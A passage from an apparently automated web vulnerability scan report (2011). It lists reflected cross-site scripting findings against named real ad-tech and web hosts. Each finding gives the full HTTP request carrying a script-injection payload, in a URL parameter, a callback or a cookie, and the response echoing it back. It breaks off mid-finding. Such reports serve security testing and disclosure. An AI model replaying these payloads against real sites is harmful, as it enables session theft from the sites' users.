GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2442
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

1.123. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f536"-alert(1)-"0101be03ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2445
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

1.124. http://domainnamesales.com/lcontact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://domainnamesales.com
Path:   /lcontact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83be0"><script>alert(1)</script>c558e1b4c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83be0\"><script>alert(1)</script>c558e1b4c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lcontact/?83be0"><script>alert(1)</script>c558e1b4c87=1 HTTP/1.1
Host: domainnamesales.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:53 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.2
X-Pingback: http://domainnamesales.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<form method="post" action="/lcontact/?83be0\"><script>alert(1)</script>c558e1b4c87=1&#8243;>
...[SNIP]...

1.125. http://ds.addthis.com/red/psi/sites/www.kenexa.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.kenexa.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e4a2<script>alert(1)</script>83865929184 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.kenexa.com/p.json?callback=_ate.ad.hpr4e4a2<script>alert(1)</script>83865929184&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.kenexa.com%2Frequest&ox15i8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh33.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 13:56:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 13:56:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 07 Mar 2011 13:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:56:52 GMT
Connection: close

_ate.ad.hpr4e4a2<script>alert(1)</script>83865929184({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.126. http://ds.addthis.com/red/psi/sites/www.metrolyrics.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.metrolyrics.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f33cb<script>alert(1)</script>4c7ee0a1303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.metrolyrics.com/p.json?callback=_ate.ad.hprf33cb<script>alert(1)</script>4c7ee0a1303&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.metrolyrics.com%2F&1pj0dsq HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh33.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; psc=6; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 07 Mar 2011 00:56:16 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 06 Apr 2011 00:56:16 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 07 Mar 2011 00:56:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 00:56:16 GMT
Connection: close

_ate.ad.hprf33cb<script>alert(1)</script>4c7ee0a1303({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.127. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 90814<script>alert(1)</script>ea8192a8c04 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=190814<script>alert(1)</script>ea8192a8c04; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:15 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:15 2011&recExp=Mon Mar 7 01:34:15 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:15 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
c=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '190814<script>alert(1)</script>ea8192a8c04', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.co
...[SNIP]...

1.128. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 70b52<script>alert(1)</script>13042405f64 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:21 2011&recExp=Mon Mar 7 01:34:21 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
okies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C70b52<script>alert(1)</script>13042405f64', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun
...[SNIP]...

1.129. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 85f4c<script>alert(1)</script>c1bc6726c37 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:18 2011&recExp=Mon Mar 7 01:34:18 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "UID": '2206bdab-24.143.206.75-129820820185f4c<script>alert(1)</script>c1bc6726c37', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30
...[SNIP]...

1.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p39750809 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p39750809 cookie is copied into the HTML document as plain text between tags. The payload 35d00<script>alert(1)</script>d41022b86e5 was submitted in the ar_p39750809 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:09 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:09 2011&recExp=Mon Mar 7 01:34:09 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:09 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
eady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p39750809": 'exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&35d00<script>alert(1)</script>d41022b86e5', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&', "U
...[SNIP]...

1.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p58096422 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p58096422 cookie is copied into the HTML document as plain text between tags. The payload 32276<script>alert(1)</script>892a2bb3012 was submitted in the ar_p58096422 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:34:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p66345759=exp=1&initExp=Mon Mar 7 01:34:07 2011&recExp=Mon Mar 7 01:34:07 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:34:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31181

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&32276<script>alert(1)</script>892a2bb3012', "ar_p81479006": 'exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%
...[SNIP]...

1.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c912d<script>alert(1)</script>bd186b7b654 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p66345759&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
